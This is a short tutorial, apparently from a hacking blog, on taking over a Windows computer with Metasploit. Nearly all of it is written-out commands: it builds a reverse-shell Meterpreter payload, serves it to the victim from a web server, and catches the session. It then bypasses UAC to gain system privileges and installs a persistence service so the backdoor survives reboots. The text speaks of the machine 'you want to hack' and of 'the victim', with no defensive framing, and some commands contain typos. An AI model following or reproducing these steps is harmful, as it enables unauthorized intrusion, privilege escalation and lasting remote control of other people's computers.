Persistence Backdoor Using Metasploit

UAC Bypass/Persistence Backdoor Using Metasploit

Creating Payload

Step 1:- To Create Payload For Windows. Open Terminal And Type.

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=1212 -f  exe >  /var/www/html/test.exe

Note: 192.168.0.103 Is My System ip Address And 1212 Is The Port Number That I Want To Use.

Step 2:- To Start Apache Server Write Below Command.

    service apache2 start

Step 3:- Open Browser Of Machine That You Want To Hack And Type "Ip Address" Of Your System.

 

Set Payload

Step 4:- msfconsole.

 

 

Step 5:- Write Following Command To Exploit Method, Set Payload And Providing ip And port And Run.

    use exploit/multi/handler

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 192.168.0.103
    set lport 1212
    run

    You Will Get A Session
    sysinfo

 

UAC Bypass

Step 6:- To Get "Admin Level Privilege".

We Need To "Migrate Process".

Write "ps" Command To See All "Process List".

 

 

Step 7:- Write Below Command To "Migrate Exporer.exe".
    migrate 5424  

And Then Run Session On Background, For That Write Below Command.
    background

 

Step 8:- Search "UAC".

 

Step 9:- "Use 10" Module To "Get System Level Privilege".

And Then Write Blow Commands.

    use exploit/windows/local/bypassuac_sdclt
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.0.103
    set lport 1212

    show options
    set sessions 1
    exploit/run

Step 10:- Write Below Command To See "Enabled Process Privileges".
    

Persistence Backdoor  

Step 11:- Run Session On Background, For That Write Below Command.

    background  

Step 12:- Search "Persistence".

Step 13:- "use 17" or "use exploit/windows/loca /persistence_service" Module And The Write Following Commands.

    show options
    session -l
    set sessions 2 (note: select your running session)

    set lport 1212
    run

 

Step 14:- Now Go To The Folder Path Given By Meterpreter Service And Check.

Duplicate File Of Your Payload File Will Save In That Path.

In My Case My File Is Store In "c:\users\rajvi\appdata\local\temp\yGvLFJ.exe".

 

 

 

Step 15:- If The "Victim Reboots" The System.

The Previous Meterpreter Session Will Be Closed. 

We Can Get Back Our Session Using Following Commands:
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.0.103
    set lport 1212
    run
    session -l